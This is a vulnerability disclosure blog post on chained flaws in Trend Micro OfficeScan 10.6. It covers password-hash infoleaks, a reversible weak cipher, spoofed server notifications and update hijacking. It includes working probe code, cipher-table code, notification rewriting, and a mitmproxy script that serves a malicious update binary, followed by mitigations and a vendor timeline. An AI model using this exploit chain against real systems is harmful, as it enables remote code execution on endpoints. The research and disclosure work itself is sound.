Trend Micro OfficeScan - A chain of bugs

Analyzing the security of security software is one of my favorite research areas: it is always ironic to see software originally meant to protect your systems open a gaping door for the attackers. Earlier this year I stumbled upon the OfficeScan security suite by Trend Micro, a probably lesser-known host protection solution (AV) that is still used on some interesting networks. Since this software looked quite complex (big attack surface) I decided to take a closer look at it. After installing a trial version (10.6 SP1) I could already tell that this software would be worth the effort:

- The server component (that provides centralized management for the clients that actually implement the host protection functionality) is mostly implemented through binary CGIs (.EXE and .DLL files)

- The server updates itself through HTTP

- The clients install ActiveX controls into Internet Explorer

And there are possibly many other fragile parts of the system. Now I would like to share a series of little issues which can be chained together to achieve remote code execution. The issues are logic and/or cryptographic flaws, not standard memory corruption issues. As such, it is not trivial to fix them, or even to decide whether they are in fact vulnerabilities. This publication comes after months of discussion with the vendor in accordance with the disclosure policy of the HP Zero Day Initiative.

A small infoleak

I focused my research on the clients as these are widely deployed on a typical network. I assumed that there must be some kind of connection between the server and the clients so the clients can obtain new updates and configuration parameters. I started to monitor the network connections of the clients and found some interesting interfaces. One of them looked like this:

POST /officescan/cgi/isapiClient.dll HTTP/1.1

User-Agent: 11111111111111111111111111111111

Accept: */*

Host: 192.168.124.134:8080

Content-Type: application/x-www-form-urlencoded

Content-Length: 96

Proxy-Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

Connection: close

RequestID=123&FunctionType=0&UID=11111111-2222-3333-4444-555555555555&RELEASE=10.6&chkDatabase=1

The RequestID parameter was the same in every request I observed, so I loaded the request into Burp Intruder and tried to brute-force other valid identifiers. ID 201 seemed particularly interesting; here’s part of the server’s answer:

HTTP/1.1 200 OK

Date: Wed, 18 Dec 2013 18:26:44 GMT

Server: Apache

Content-Length: 2296

Connection: close

Content-Type: application/octet-stream

[INI_CRITICAL_SECTION]

Master_DomainName=192.168.124.134

Master_DomainPort=8080

UseProxy=0

Proxy_IP=

Proxy_Port=

Proxy_Login=

Proxy_Pwd=

Intranet_Proxy_Socks=0

Intranet_NoProxyCache=0

HTTP_Expired_Day=30

ServicePack_Version=0

Licensed_UserName=

Uninstall_Pwd=!CRYPT!5231C05389DD886C99EA4646653498C2DB98EFD6EF61BD4907B2BD97E4ACDAED73AEE46B44AACBC450915317269

Unload_Pwd=!CRYPT!5231C05389DD886C99EA4646653498C2DB98EFD6EF61BD4907B2BD97E4ACDAED73AEE46B44AACBC450915317269

(...)

The same answer is returned regardless of the UID parameter. As you can see, there are two parameters, Uninstall_Pwd and Unload_Pwd, which are (seemingly) encrypted, indicating that these values are something to protect. Indeed, the clients can be unloaded or uninstalled only after providing a special password (a SYSTEM level service is responsible for protecting the main processes of the application from being killed or debugged), and this is what we see encoded in these fields. So what do we do with the encryption? The OfficeScan program directory contains a file called pwd.dll that might have something to do with these passwords, so let’s disassemble it! Indeed, this library exports functions like PWDDecrypt(), but as it turns out, these are not the functions we are looking for…
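
The probing and the extraction of the protected fields described above can also be sketched in a few lines of Python instead of Burp Intruder. This is only a rough illustration: the function names build_body, probe and crypt_fields are made up for this example, and the base URL passed to probe is assumed to point at a lab server like the one in the capture.

```python
import urllib.parse
import urllib.request

def build_body(request_id, uid="11111111-2222-3333-4444-555555555555"):
    """Form body mirroring the captured request, with a variable RequestID."""
    return urllib.parse.urlencode([
        ("RequestID", request_id),
        ("FunctionType", 0),
        ("UID", uid),
        ("RELEASE", "10.6"),
        ("chkDatabase", 1),
    ])

def probe(base_url, request_id, timeout=5.0):
    """POST one probe; base_url is e.g. 'http://192.168.124.134:8080' (lab host)."""
    req = urllib.request.Request(
        base_url + "/officescan/cgi/isapiClient.dll",
        data=build_body(request_id).encode("ascii"),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("latin-1")

def crypt_fields(ini_text):
    """Return {key: hex} for every 'key=!CRYPT!<hex>' line of an INI-style answer."""
    found = {}
    for line in ini_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and value.startswith("!CRYPT!"):
            found[key] = value[len("!CRYPT!"):]
    return found
```

Looping probe over a range of identifiers and passing each answer to crypt_fields quickly shows which RequestID values leak protected settings.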

After doing a quick

find . -name '*.dll' -exec strings -f {} \; | grep '!CRYPT!'



we find that TmSock.dll is a likely candidate. After disassembling this library we find that there is an export called TmDecrypt(). This function checks if its parameter string starts with !CRYPT!. If it doesn’t, it calls the export of pwd.dll, but if it does, it calls an internal routine that I named hardcoded_pass:



The naming is not coincidental: this subroutine references two strings which definitely look like hardcoded passwords.

After a quick Google search (Protip: always google strings like these, you can save yourself lots of time by not recreating public results) one can find this post by Luigi Auriemma, which describes that this function is used to decrypt the above configuration parameters and in this case returns the MD5 hashes of the uninstall/unload passwords. MD5 hashes can be brute-forced efficiently, so this is definitely bad, not to mention that the proxy password can be retrieved in plain text.

But this is not really high impact, so I dug further.

Picking up more pieces

I monitored the client-server communication for quite some time and I realized that after issuing a configuration change at the server, a special HTTP request is sent from the server to the TCP/61832 port of the client. This is a simple GET request in the form of:

http://server:61832/?[hex_string]

The hex_string parameter looked similar to the previous “encrypted” values but without the !CRYPT! prefix. Remember, the TmDecrypt() function of TmSock.dll called into pwd.dll if the input string didn’t start with that prefix, so this must be a ciphertext for pwd.dll!
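
The prefix-based dispatch can be summarised with a tiny Python sketch. It only mirrors the control flow described above; the two callables stand in for the internal hardcoded_pass routine and the pwd.dll export, and whether the real routine receives the value with or without the prefix is an assumption made here.

```python
from typing import Callable

CRYPT_PREFIX = "!CRYPT!"

def tm_decrypt(value: str,
               hardcoded_pass: Callable[[str], str],
               pwd_decrypt: Callable[[str], str]) -> str:
    """Route a value to one of two decryptors based on its prefix."""
    if value.startswith(CRYPT_PREFIX):
        # Prefixed values go to the routine with the hardcoded passwords
        # (assumption: the prefix is stripped before decryption).
        return hardcoded_pass(value[len(CRYPT_PREFIX):])
    # Everything else is treated as a pwd.dll ciphertext.
    return pwd_decrypt(value)
```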

Before decrypting that hex string, let’s take a quick look at the exports of pwd.dll! After creating a small wrapper around the PWDEncrypt() export I found some interesting results:

> pwdenc A

00

> pwdenc AA

006C

> pwdenc AB

006F

> pwdenc BA

036C

> pwdenc BB

036F

> pwdenc ABC

006F00

As you can see, this algorithm is basically a simple polyalphabetic cipher (similar to the Vigenère cipher), which I could easily recreate independently of the original library: after running a quick loop that encrypted 1KB strings of all printable characters (1024 times ‘A’, 1024 times ‘B’, etc.), I had a database that could be used to encrypt and decrypt virtually anything. I could later use this database to construct my exploit without the original binaries or lots of reverse engineering.
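
The table-building trick can be sketched as follows. Since pwd.dll is not available here, demo_oracle is a hypothetical stand-in for the pwdenc wrapper: a per-position XOR whose first three key bytes were chosen so that it reproduces the sample outputs above, while the remaining key bytes are invented. That the real routine is a plain XOR is an assumption; the only property the sketch relies on is that each output byte depends solely on the position and the input character.

```python
ALPHABET = [chr(c) for c in range(0x20, 0x7F)]  # printable ASCII

# Hypothetical key: bytes 0-2 match the samples in this post, the rest is made up.
_DEMO_KEY = bytes([0x41, 0x2D, 0x43, 0x17, 0x5A, 0x08, 0x66, 0x31])

def demo_oracle(plaintext):
    """Stand-in for the PWDEncrypt() wrapper; returns upper-case hex."""
    return "".join(
        "%02X" % (ord(ch) ^ _DEMO_KEY[i % len(_DEMO_KEY)])
        for i, ch in enumerate(plaintext)
    )

def build_tables(oracle, length):
    """Encrypt 'AAAA...', 'BBBB...', etc. and record one table per position."""
    enc = [dict() for _ in range(length)]
    dec = [dict() for _ in range(length)]
    for ch in ALPHABET:
        hexed = oracle(ch * length)
        for pos in range(length):
            byte = hexed[2 * pos:2 * pos + 2]
            enc[pos][ch] = byte
            dec[pos][byte] = ch
    return enc, dec

def encrypt(enc, text):
    """Encrypt by table lookup only, without calling the oracle."""
    return "".join(enc[pos][ch] for pos, ch in enumerate(text))

def decrypt(dec, hexed):
    """Decrypt a hex string by table lookup only."""
    return "".join(
        dec[pos][hexed[2 * pos:2 * pos + 2]] for pos in range(len(hexed) // 2)
    )
```

Once the tables exist, the oracle (and with it the original library) is no longer needed, which is what makes this approach convenient for exploit development.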

Back to the original problem, let’s decrypt the hex string already:

SEQ=80&DELAY=0&USEPROXY=0&PROXY=&PROXYPORT=0&PROXYLOGIN=&PROXYPWD=&SERVER=192.168.124.134&SERVERPORT=8080&PccNT_Version=10.6&Pcc95_Version=10.6&EngineNT_Version=9.700.1001&Engine95_Version=&ptchHotfixDate=20131228153813&PTNFILE=1050100&ROLLBACK=1050100&MESSAGE=20&TIME=201312281648170406&DIRECT_UPDATE=1&IP=60d9f344c3a3868f909a6ae787e9d183&NT_ENGINE_ROLLBACK=9.700.1001&95_ENGINE_ROLLBACK=&TSCPTN_VERSION=1348&TSCENG_VERSION=7.1.1044&SPYWARE=0&CTA=2.1.103&CFWENG_VERSION=5.82.1050&CFWPTN_VERSION=10333&DCSSPYPTN_VERSION=222&VAPTN_VERSION=&ITRAP_WHITE_VERSION=93900&ITRAP_BLACK_VERSION=17100&VSAPI2ENG_VERSION=&VSAPI2PTN_VERSION=&SSAPIENG_VERSION=6.2.3030&SSAPIVSTENG_VERSION=&SSAPIPTN_VERSION=1469&SSAPITMASSAPTN_VERSION=146900&ROOTKITMODULE_VERSION=2.95.1170&ReleaseIPList=&NVW300_VERSION=&CleanedIPList=&NON_CRC_PATTERN_ROLLBACK=1050100&NON_CRC_PATTERN_VERSION=1050100&SETTING_SEQUENCE=0160670003&INDIVIDUAL_SETTING=1

Update: Luigi noted that he implemented both encryption algorithms in his trendmicropwd tool.

The purpose of this message is to notify the clients that there are new configuration parameters to be applied. After receiving this message the client connects back to the server for more information. To make sure that clients won’t lose their connection when the network architecture changes, this notification message already contains the most basic connection information, like the server address or the proxy.

Can we spoof such a message? We have already seen that encryption is not an issue, and most parameters are basically public version and configuration parameters. The only problematic part is the IP parameter that seems to contain a hash value. How is this value constructed?

You can use scripts like FindCrypt to find the MD5 routine in the TMListen executable. Setting a breakpoint on it reveals that the preimage looks something like this:

[jdkNotify] error=-1471291287,clinet=472bc675-3862-4e9d-9890-e3b14d4ddc3e,server=SEQ=80&DELAY=0&USEPROXY=0&PROXY=&PROXYPORT=0&PROXYLOGIN=&PROXYPWD=&SERVER=192.168.124.134&SERVERPORT=8080ccNT_Version=10.6&Pcc95_Version=10.6&EngineNT_Version=9.700.1001&Engine95_Version=&ptchHotfixDate=20131228153813&PTNFILE=1050100&ROLLBACK=1050100&MESSAGE=20&TIME=201312281648170406&DIRECT_UPDATE=1, return -1293342568

As you can see, most of the parameters are similar to the ones before. The only ugly value seems to be the clinet (sic!) parameter, which is the GUID of the client generated at install time. From an exploitation standpoint this is bad, since you can’t really guess this value, but if we strengthen our attacker model a bit we can find some realistic vectors, since:

- The client GUIDs are periodically sent over the network in clear text

- Local attackers can access this value by default through OfficeScan configuration and log files
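
Why the GUID is the only real secret here can be illustrated with a few lines of Python. The exact byte layout of the hashed data is not spelled out in this post, so the concatenation used below (GUID followed by the leading parameters) is purely an assumption for illustration, and notification_hash is a made-up name. The point is only that the digest is not keyed by anything the attacker cannot learn once the GUID is known.

```python
import hashlib

def notification_hash(client_guid, leading_params):
    """MD5 over GUID + parameters.

    ASSUMPTION: the concatenation order and separators are hypothetical;
    the real preimage layout would have to be taken from the debugger.
    """
    preimage = (client_guid + leading_params).encode("ascii")
    return hashlib.md5(preimage).hexdigest()
```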

So for the sake of this writeup let’s assume that we know this GUID – what can we achieve with the notification messages?

It is obvious that we can set our own address as the server’s, or act as a proxy, by setting the appropriate parameters in the notification message, effectively gaining a man-in-the-middle position. If we also set some higher version numbers in the notification, we can trigger the update process of the software.

From this point the most obvious way to gain control over the client is to hijack the update process and let the client download and execute a malicious binary as part of the update. I put together a small mitmproxy script for this task:
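
Rewriting a decrypted notification along these lines could look like the sketch below. The parameter names come from the decrypted message shown earlier; the helper names, the attacker address and the choice of PTNFILE as the version to bump are assumptions for illustration. The IP hash would still have to be recomputed and the result re-encrypted before sending.

```python
from urllib.parse import parse_qsl

def parse_notification(msg):
    """Split the decrypted message into ordered (key, value) pairs."""
    return parse_qsl(msg, keep_blank_values=True)

def retarget(pairs, proxy_host, proxy_port, bump=("PTNFILE",)):
    """Point the client at our proxy and raise selected version numbers."""
    out = []
    for key, value in pairs:
        if key == "USEPROXY":
            value = "1"
        elif key == "PROXY":
            value = proxy_host
        elif key == "PROXYPORT":
            value = str(proxy_port)
        elif key in bump and value.isdigit():
            value = str(int(value) + 1)  # any higher version should do
        out.append((key, value))
    return out

def serialize(pairs):
    """Join the pairs back without URL-encoding, as in the original message."""
    return "&".join("%s=%s" % (k, v) for k, v in pairs)
```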

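# Inline script for the legacy mitmproxy API (handlers receive context and flow)
import hashlib
import time

def _getFile():
    # Read the replacement executable and compute its MD5 for the hotfix list
    with open("malware.exe", "rb") as my_exe:
        exe_cont = my_exe.read()
    exe_hash = hashlib.md5()
    exe_hash.update(exe_cont)
    return (exe_cont, exe_hash)

def response(context, flow):
    # Rewrite the hotfix list so that the TMBMSRV entry matches our binary
    if "HotFix=" in flow.response.content:
        exe_cont, exe_hash = _getFile()
        rows = flow.response.content.split("\r\n")
        for i, r in enumerate(rows):
            if "TMBMSRV" in r:
                rows[i] = "/officescan/hotfix_engine/TMBMSRV.exe=%s,%s,3.00.0000" % (
                    time.strftime("%Y%m%d%H%M%S"), exe_hash.hexdigest())
        flow.response.content = "\r\n".join(rows)
    # Serve our binary when the client downloads the executable itself
    if "TMBMSRV" in flow.request.get_url():
        exe_cont, exe_hash = _getFile()
        flow.response.content = exe_cont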



Still, my evil plan didn’t work. What could have gone wrong? Although the executables of OSCE are stripped of debug information, the developers left many debug strings in the programs, which are usually used through different “logger” functions. By hooking these functions one can basically get real-time information about the internal state of the processes. This helped a lot during the reversing process and also revealed the problem with my binary planting:

As it turns out, OSCE only accepts signed binaries, which is a good approach to handling updates that are delivered over untrusted channels (handling TLS certificates in a corporate environment can be tricky…). To overcome this problem I first looked for unsigned PE files in the OSCE installation using the disitool script of Didier Stevens:

$ find . -iname '*.exe' -exec echo {} \; -exec python ~/tools/disitool.py extract {} /tmp/sig \; 2>&1 | grep Error -B1

./7z.exe

Error: source file not signed

--

./bzip2.exe

Error: source file not signed

--

./bspatch.exe

Error: source file not signed

$ find . -iname '*.dll' -exec echo {} \; -exec python ~/tools/disitool.py extract {} /tmp/sig \; 2>&1 | grep Error -B1

./libeay32.dll

Error: source file not signed

--

./libcurl.dll

Error: source file not signed

--

./7z.dll

Error: source file not signed

(...)

But before I could find out whether these files can be replaced remotely, Dnet suggested planting a binary that is signed, but not with Trend Micro’s key. As a quick test I used the installer of TotalCommander, which is signed by a party that WinVerifyTrust, the Windows API intended for signature verification, accepts by default. The test was successful: it seems that OSCE only cares about whether the updates are signed, not about who signed them. Remember: digital signatures only tell you about the creator of the message, not the intent of the creator :)
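
The difference between the observed behaviour and a stricter policy can be modelled in a few lines. This is a conceptual sketch only: SignatureInfo and both policy functions are hypothetical, the signer names in the usage example are placeholders, and a real implementation should pin a certificate or public key rather than compare display names.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class SignatureInfo:
    chain_trusted: bool  # certificate chain validates against the system store
    signer: str          # identity of the signing party (placeholder)

def accepts_any_trusted_signer(sig: Optional[SignatureInfo]) -> bool:
    """Observed behaviour: any validly signed file passes."""
    return sig is not None and sig.chain_trusted

def accepts_vendor_only(sig: Optional[SignatureInfo], expected_signer: str) -> bool:
    """Stricter policy: the file must also be signed by the expected party."""
    return (sig is not None and sig.chain_trusted
            and sig.signer == expected_signer)
```

A third-party installer passes the first check but fails the second, which is exactly the gap exploited here.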

Putting it all together

All in all I could identify several weaknesses of OfficeScan:

- OfficeScan uses weak encryption

- OfficeScan uses hardcoded encryption keys

- OfficeScan doesn’t properly authenticate the peers of the system (servers and clients)

- OfficeScan doesn’t verify if its signed executables originate from the vendor or other trusted party

By themselves these issues don’t pose a serious threat, but combined they can be used to achieve remote code execution on any client:

- Obtain the GUID of the target client

- Construct a notification message that contains the attacker’s host as the proxy, and version information that causes the client to request an update

- Replace an arbitrary executable in the update with a malicious one signed with a certificate issued by a CA present by default in the certificate store of Windows (this costs a few hundred USD)

The following video demonstrates the attack:

This attack is realistic when the attacker is able to intercept client GUIDs from the network or wants to escalate her privileges locally. With another infoleak it might be possible to improve the attack to be CVSS 10.0. Other exploit vectors based (partially) on these findings are also possible; the software is big and I haven’t looked at most of it yet.

Vendor response and Countermeasures

I notified the vendor about the first infoleak on 3rd January 2014. Trend Micro responded immediately and I’ve been sharing information about the different issues and possible attack vectors since then (for the detailed timeline check below). Although Trend Micro was the most responsive vendor I’ve personally worked with, it seems that they are not really experienced in handling security vulnerabilities: after months of discussion it is still unclear whether they consider the reported issues vulnerabilities or “features”, whether the latest release (OSCE 11) solves any of the reported issues*, and whether there are configuration steps which can lower the risk of an attack. Without this information I can’t even really write a formal advisory, so you have to settle for this blog post for now.

Since I couldn’t see satisfactory progress in improving the security of the product I decided to publish my results so anyone can assess the risks, and possibly implement some mitigations:

- Implement firewall rules which restrict OfficeScan ports to be accessible only for known legitimate peers, both at the servers and at the clients (I can also recommend this for every other centrally managed AV solution)

- Use strong Unload/Uninstall passwords

- Restrict access to OfficeScan configuration files and logs for local users

- Wrap OfficeScan communication in secure network protocols like TLS or IPSec

* After taking a quick look at version 11 it seems that the notification messages are now digitally signed, effectively breaking the presented remote method (I didn’t have time for an in-depth analysis yet though), but since the basic architecture and the symmetric crypto components remained the same, local privilege escalation should still be possible.

Timeline

2014-01-03: Initial contact request sent to info@trendmicro.com and security@trendmicro.com

2014-01-03: Response received from vendor

2014-01-04: Sent vulnerability details to vendor

2014-01-07: Vendor response: issue under investigation

2014-01-08: Vendor requesting further information

2014-01-08: Additional information sent to the vendor

2014-01-14: Vendor requesting further information

2014-01-15: Demonstration video sent to the vendor

2014-01-28: Vendor acknowledges the vulnerability

2014-01-28: Requesting information about estimated date of fix

2014-02-03: Vendor response: fixed version is expected to be released mid-year

2014-02-05: Sent details of binary planting attack vector

2014-02-18: Requesting confirmation of reception of the additional vulnerability information sent on 2014-02-05

2014-02-24: Vendor confirms reception of additional vulnerability information

2014-02-27: Vendor response: special configuration can enforce stricter binary signature checking

2014-02-28: Requesting information about planned fix and possible configuration hardenings

2014-03-05: Vendor responds with partial information

2014-03-05: Requesting more details/clarification about the possible countermeasures and planned fixes

2014-03-17: Vendor responds with partial information

2014-05-05: Informing vendor about the planned release of vulnerability information, requesting information about the status of the fixes and possible configuration hardenings

2014-05-07: Vendor informs that OSCE 11 is released, fix status is unclear

2014-06-06: Public disclosure